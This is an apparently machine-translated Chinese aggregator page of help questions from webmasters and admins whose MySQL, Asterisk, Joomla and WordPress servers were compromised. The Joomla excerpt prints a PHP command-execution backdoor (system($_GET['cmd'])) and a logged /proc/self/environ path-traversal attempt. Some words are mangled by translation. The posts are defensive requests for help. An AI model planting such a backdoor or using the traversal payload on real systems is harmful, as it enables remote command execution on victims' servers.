Articles of 黑客

我的MySQL数据库已经被黑客攻击了，我找不到漏洞。 我在PHP中有很好的保护，防止注入，黑客自己也跟我交stream过，说他不是通过注入方式黑客攻击。 如果没有注入，还有什么其他方法可以被黑客入侵？ 我知道他不知道我的数据库密码，我没有得到DDOS攻击，第三，我的网站上没有黑客想要的个人信息，所以我认为黑客说的是实话。 那么如何在不注入的情况下篡改MySQL数据库呢？

这可能是一个社区维基，我不确定。 想象一下，在浏览网页时，您发现公司网站的安全漏洞。 例如，涉及向您发布信息的URL参数更改的内容，例如，您不应该访问此信息。 通过改变这些领域，你有罪“黑客”？ 如果是这样，你是否应该向公司报告安全漏洞，或者如果你承认自己的“内疚”，是否有法律上的反感？ 澄清要求：这是所有外部面向，完全可访问的.NET页面，接受variables时可能会有意想不到的结果。 第二编辑：要清楚这不是我工作的公司，而是互联网上的另一个网站，我没有任何关系。

我们的星号服务器被入侵了。 一些电话是上周末向亚洲国家发出的。 认为我们已经改进了networkingconfiguration，我们仍然想确定入侵是如何完成的，我们认为星号日志文件中有线索。 但我们不知道要找什么，基于默认的星号： 安装星号服务器时需要考虑哪些安全问题？

我假设这些是一些机器人，但想知道他们想要做什么，我的服务器。 问题中的日志在下面，IP地址已经改变了。 12.34.56.78 – – [18/Oct/2012:16:48:20 +0100] "\x86L\xED\x0C\xB0\x01|\x80Z\xBF\x7F\xBE\xBE" 400 172 "-" "-" 12.34.56.78 – – [18/Oct/2012:16:50:28 +0100] "\x84K\x1D#Z\x99\xA0\xFA0\xDC\xC8_\xF3\xAB1\xE2\x86%4xZ\x04\xA3)\xBCN\x92r*\xAAN\x5CF\x94S\xE3\xAF\x96r]j\xAA\xC1Y_\xAE\xF0p\xE5\xBAQiz\x14\x9F\x92\x0C\xCC\x8Ed\x17N\x08\x05" 400 172 "-" "-" 12.34.56.78 – – [18/Oct/2012:16:58:32 +0100] "g\x82-\x9A\xB8\xF0\xFA\xF4\xAD8\xBA\x8FP\xAD\x0B0\xD3\xB2\xD2\x1D\xFF=\xAB\xDEC\xD5\xCB\x0B*Z^\x187\x9C\xB6\xA6V\xB8-D_\xFE" 400 172 "-" "-" 12.34.56.78 – – [18/Oct/2012:17:06:59 +0100] "\xA61[\xB5\x02*\xCA\xB6\xC6\xDB\x92#o.\xF4Kj'H\xFD>\x0E\x15\x0E\x90\xDF\xD0R>'\xB8A\xAF\xA3\x13\xB3c\xACI\xA0\xAA\xA7\x9C\xCE\xA3\x92\x85\xDA\xAD1\x08\x07\xFC\xBB\x0B\x95\xA8Z\xCA\xA1\xE0\x88\xAEP" 400 172 "-" "-" 12.34.56.78 – – [18/Oct/2012:17:13:53 +0100] "b\xC4\xA24Z\xA2\x95\xEFc\xAF\xF1\x93\xE8\x81\xFD\xB4\xDEo\x92\xC0v\x1Fe\xD8W\x85\xC7O\x9D\x8C\x89<" 400 172 "-" "-" 12.34.56.78 – – […]

我醒来发现，在我的共享networking主机777权限的所有文件夹有两个新的PHP文件。 该文件内的代码无法读取 – 这里是解码版本： http : //pastie.org/779226 （什么…？）该代码甚至被注入一些PHP文件。 我不知道如何有人会这样做？ 我知道拥有777权限并不是最聪明的，但是他们是如何进入我的文件夹系统的。 我只是一个客户端程序员，如果我有一些关于如何避免这种情况发生的build议，那将是非常好的。 干杯。

使用netstat -na我注意到我有很多连接 tcp 0 0 XXX.XXX.XXX.XXX:25 YYY.YYY.YYY.YYY:13933 ESTABLISHED tcp 0 0 XXX.XXX.XXX.XXX:25 ZZZ.ZZZ.ZZZ.ZZZ:9528 ESTABLISHED 那些地址到美国，巴西等，尽pipe我的服务器位于英国。 这可能是一些“非法”的活动，如垃圾邮件或什么的？ [root@myserver ~]# tcpdump port 25 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes 20:54:33.842388 IP g224057157.adsl.remotehost1.de.23970 > XXX.XXX.XXX.XXX.smtp: S 3343584823:3343584823(0) win 8192 <mss 1360,nop,wscale 2,nop,nop,sackOK> […]

我使用一个Netgear无线路由器，连接到各种无线设备。 我的一个无线设备不支持WPA2安全，所以我不得不将路由器的安全性降级到WEP。 我们都知道WEP是坏的，所以作为一项额外的措施，我在路由器上启用了一个无线访问列表，以便只有指定MAC地址在我的访问列表中的设备才被允许连接到路由器。 我知道，为了访问像这样的安全networking，可以伪装设备的MAC地址。 但是容易吗？ 是否使用WEP和无线访问列表来防止大多数黑客攻击？ 还是应该尽我所能确保所有设备将来都支持WPA2？

我运行的Joomla网站前几天被黑了。 黑客把一些文件放到了tmp目录下，并在那里运行了一个HTTP守护进程（至less这是我的主机告诉我的）。 无论如何，我一直在努力清理他们留下的文件，并确保我能做到，但在检查我的日志时，我注意到了www.domain.com/?cmd=ls上的一个命中。 这对我来说似乎很奇怪，所以我试了一下……并且注意到它列出了我站点根目录下的所有文件。 有人可以向我解释为什么发生这种情况，我怎么阻止它？ 这似乎是一个巨大的利用，我想立即消除。 更新 ：在挖掘我注意到一些额外的行添加到我的Joomla index.php： if ($_GET['cmd']!=null) { system($_GET['cmd']); } 我已经删除了这些内容，但是很想知道攻击者是如何设法编辑这些内容的。 不确定在哪里看，以确保我closures了任何后门。 更新更新 ：首先让我说，是的，我意识到在这里采取正确的行动是把网站吹走并从备份恢复。 不过，我宁愿把它作为最后的手段，因为（一）这是一个网站，取决于社区的贡献，我的备份不是最近（我的错，我知道）和（二）我正在一个新的版本，应该很快就绪。 但是因为我似乎在这里得到了一些帮助，所以我会添加一些我发现/为了解决这种情况而做的其他事情。 在我的/ tmp文件夹中发现了一些.kin（或者类似的东西 – 没有记下来并且马上删除它）目录，显然这个http守护进程从哪里运行。 我假设gunzip（下面提到）是这样放在这里的。 在我的error_log文件中，我发现以下可疑条目（“…”是我尝试从这个post中删除path/文件名）： [04-Jul-2010 09:45:58] PHP Fatal error: Class 'CkformsController../../../../../../../../../../../../../../../proc/self/environ' not found in … on line 24 [05-Jul-2010 12:31:30] PHP Notice: Undefined index: HTTP_USER_AGENT in … on line 92 [04-Jul-2010 06:41:52] PHP […]

我有很多在Bluehost共享主机环境中托pipe的WordPress站点。 最近当我在Googlesearch一个网站时，它说“网站可能会被入侵”。 我从Google网站pipe理员那里收到有关WP网站中某个脚本的警报。 当我查看这些网站时，我在页脚中find了一些链接，提到了"myteenmovies.net"和另一个网站。 Whois信息显示，他们是俄罗斯网站。 我还发现一些其他的PHP文件，怪异的名字， wxwz.php ， xypz.php等… PHP代码被encryption了一些eval(gununcompress(base64_decode())) 。 还有另外一个文件，里面有一个注释“#b shell by orb”。 我知道黑客已经完全访问我的服务器（使用Webshel​​l脚本）。 所有的网站都很老了（大约一年），Wordpress 2.5。 权限是755.任何人都可以猜测或build议，黑客是如何上传文件？ FTP / SSH / Cpanel密码相当强大。 任何其他方式？

我只是认识到Windows隐藏了一些特殊用户，例如NT Authority\SYSTEM用户或在安装SQL Server（ ReportServer$SQLEXPRESS ， IIS_IURS ，…）之后添加的用户。 我知道有可能在特定用户的权限下执行应用程序，所以它工作正常。 根据我的理解，用户是活跃的，但在计算机启动时尝试login时无法访问。 Windows也只显示特定的用户，所以在Windows中必须有一个选项，可以定义用户帐户是否可见。 只是为了我的兴趣，我试图让隐藏的用户帐户可见。 经过几分钟的研究，我偶然发现了一个registry黑客： HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 。 出于某种原因，它不会在我的机器上工作。 我也尝试重新启动我的电脑和类似的东西。 但有些显示Windows必须有一个选项在哪里隐藏useres。 它在哪里？ 我search了几个小时，并检查了所有可用的选项Windows – 我无法find一个方法。 我的目标是可以从欢迎屏幕以NT Authority\SYSTEM身份login。 我该怎么做，哪里有Windows保护这种可能性？ 为什么net users显示其他用户（除了我的，客人，pipe理员）？